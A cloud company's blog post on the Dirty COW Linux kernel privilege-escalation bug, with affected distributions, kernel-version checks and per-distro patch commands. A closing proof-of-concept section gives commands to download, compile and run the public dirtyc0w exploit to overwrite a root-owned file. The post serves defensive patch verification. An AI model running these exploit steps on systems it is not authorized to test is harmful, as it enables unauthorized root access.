AllCloudAllCloudAllCloudAllCloud
  • English
    • עברית
    • Deutsch
  • CLOUD PLATFORMS
    • AWS Expertise
    • Cloud Architecture Workshop
    • Professional Services
    • Cloud MSP
    • Big Data
    • Cloud Security
    • Well-Architected Program
    • Competencies
      • Cloud Migration Practice
      • Microsoft Workloads on AWS
      • Security Engineering and Operations on AWS
  • BUSINESS APPLICATIONS
    • Approach & Methodology
    • Salesforce Expertise
    • CPQ
    • NetSuite ERP
    • Vertical Solutions
  • CUSTOMERS
    • Customer List
    • Case Studies
  • PARTNERS
    • Amazon Web Services
    • Salesforce
    • NetSuite
    • Solutions Partners
  • ABOUT US
    • About AllCloud
    • Leadership
    • Careers
    • News
  • BLOG
  • CONTACT US

CVE-2016-5195 – Dirty Cow Vulnerability

Home > Tech Notes > CVE-2016-5195 – Dirty Cow Vulnerability

Overview

The dirty cow is a new high profile privilege escalation vulnerability in Linux. The latest in a series of branded bugs such as Heartbleed, Ghost and ShellShock. In this post I’ll give more details about this vulnerability and how to mitigate the risk of your systems.

Present in Linux kernel versions 2.6.22 and higher, the issue has existed since 2007. After a discovery by a security researcher named Phil Oester, it was fixed on Oct 18, 2016. Which means that there’s a high probability that your Linux running devices are vulnerable.

Description

The description from Redhat’s CVE:

“A race condition was found in the way the Linux kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.”

First, an attacker gains access to the machine. Second,  the attacker will run a publicly available exploit (several exist). A successful attack will result in the attacker gaining root privileges. This attack will not be logged, therefore will pass undetected.

Patches are available to most Linux distros.

Vulnerable Linux distros (Common):

Your first concern should be to mitigate the bug in your servers. Which probably have the most users and application packages. But you should also attend to network appliances and less common Linux distros such as CoreOS.

  1. Red Hat Enterprise Linux 7.x
  2. Red Hat Enterprise Linux 6.x
  3. Red Hat Enterprise Linux 5.x
  4. CentOS Linux 7.x
  5. CentOS Linux 6.x
  6. CentOS Linux 5.x
  7. Debian Linux wheezy
  8. Debian Linux jessie
  9. Debian Linux stretch
  10. Debian Linux sid
  11. Ubuntu Linux precise (LTS 12.04)
  12. Ubuntu Linux trusty
  13. Ubuntu Linux xenial (LTS 16.04)
  14. Ubuntu Linux yakkety
  15. Ubuntu Linux vivid/ubuntu-core
  16. SUSE Linux Enterprise 11 and 12.
  17. Amazon Linux AMI

Testing for a vulnerable kernel

Run the following command according to your distro:

$ uname -a

$ uname -mrs

Sample output:

Linux 3.13.0-95-generic x86_64

Fixing the issue

-Debian or Ubuntu Linux

$ sudo apt-get update && sudo apt-get upgrade && sudo apt-get dist-upgrade

$ sudo reboot

-RHEL / CentOS Linux 5.x/6.x/7.x

Red Hat is releasing the patches to the various versions gradually without supplying a deadline.|
For the updated info please refer to: https://access.redhat.com/security/vulnerabilities/2706661
.

$ sudo yum update

$ sudo reboot

-Suse Enterprise Linux or OpenSuse Linux

To apply all needed patches to the system type:

# zypper patch

# reboot

-Amazon Linux AMI

The patched kernel’s version is: “kernel-4.4.23-31.54.amzn1.x86_64”.
To update the kernel:

# sudo yum update kernel

# reboot

Proof of Concept exploit

The POC will assist you to determine whether a less common Linux is vulnerable/patched:

  • Download:

$ wget

https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c

  •  Create a target file as root:

$ sudo -s

# echo this is not a test > foo

  •  Run the PoC as normal user:

$ gcc -lpthread dirtyc0w.c -o dirtyc0w

$ ./dirtyc0w foo m00000000000000000

mmap 56123000

madvise 0

procselfmem 1800000000

$ cat foo

M00000000000000000

 

Editors note: 

I updated the post to include Amazon Linux AMI and the latest info from Red Hat.


References:

  1. https://access.redhat.com/security/cve/cve-2016-5195
  2. https://www.exploit-db.com/exploits/40611/
  3. https://arstechnica.com/security/2016/10/most-serious-linux-privilege-escalation-bug-ever-is-under-active-exploit/
Lahav Savir

Lahav Savir

More posts by Lahav Savir

Recent Posts

  • 17 January, 2019
    Comments Off on AllCloud Earns AWS Certification Distinction for Achieving 100 Certified Professionals

    AllCloud Earns AWS Certification Distinction for Achieving 100 Certified Professionals

  • 2 January, 2019
    Comments Off on The Sunset of Multi-cloud and Rise of Hybrid Cloud

    The Sunset of Multi-cloud and Rise of Hybrid Cloud

  • 9 December, 2018
    Comments Off on AllCloud Named a CloudHealth “Partner of the Year”

    AllCloud Named a CloudHealth “Partner of the Year”

  • 4 December, 2018
    Comments Off on AWS Launches Fully Managed Windows File Servers

    AWS Launches Fully Managed Windows File Servers

Tags

allcloud Architecture automation AutoScale AWS aws managed service partner Cloud Cloud Architecture cloud migration CRM DevOps Disaster recovery (DRP) EBS EC2 ELB enterprise F5 GCE GCP GDPR Google Google Cloud Platform Graylog2 Hardening High Availability Linux load balancing Logging Managed Services Monitoring MSP Nagios NetSuite OpenVPN puppet reInvent S3 Salesforce Security snort SSL subscription services VMware VPC Zuora

ARCHIVE

  • January 2019
  • December 2018
  • November 2018
  • October 2018
  • September 2018
  • July 2018
  • May 2018
  • April 2018
  • March 2018
  • February 2018
  • January 2018
  • December 2017
  • November 2017
  • October 2017
  • September 2017
  • August 2017
  • July 2017
  • June 2017
  • May 2017
  • April 2017
  • March 2017
  • February 2017
  • January 2017
  • December 2016
  • October 2016
  • September 2016
  • August 2016
  • June 2016
  • May 2016
  • January 2016
  • December 2015
  • October 2015
  • September 2015
  • May 2015
  • February 2015
  • January 2015
  • November 2014
  • October 2014
  • September 2014
  • July 2014
  • May 2014
  • April 2014
  • March 2014
  • February 2014
  • January 2014
  • December 2013
  • November 2013
  • October 2013
  • July 2013
  • June 2013
  • May 2013
  • February 2013
  • December 2012
  • November 2012
  • October 2012
  • September 2012
  • July 2012
  • June 2012
  • May 2012
  • April 2012
AllCloud Logo
  • Home
  • Cloud Platforms
  • Cloud Architecture Workshop
  • Professional Services
  • Managed Services
  • Business Applications
  • Salesforce Expertise
  • Vertical Solutions
  • Customers
  • Case Studies
  • Partners
  • Amazon Web Services
  • Salesforce
  • About Us
  • Leadership
  • News
  • Careers
  • Blog
  • Privacy Policy
  • Contact us
Copyright 2017 | AllCloud | All Rights Reserved
  • English
    • עברית
    • Deutsch
  • CLOUD PLATFORMS
    • AWS Expertise
    • Cloud Architecture Workshop
    • Professional Services
    • Cloud MSP
    • Big Data
    • Cloud Security
    • Well-Architected Program
    • Competencies
      • Cloud Migration Practice
      • Microsoft Workloads on AWS
      • Security Engineering and Operations on AWS
  • BUSINESS APPLICATIONS
    • Approach & Methodology
    • Salesforce Expertise
    • CPQ
    • NetSuite ERP
    • Vertical Solutions
  • CUSTOMERS
    • Customer List
    • Case Studies
  • PARTNERS
    • Amazon Web Services
    • Salesforce
    • NetSuite
    • Solutions Partners
  • ABOUT US
    • About AllCloud
    • Leadership
    • Careers
    • News
  • BLOG
  • CONTACT US
AllCloud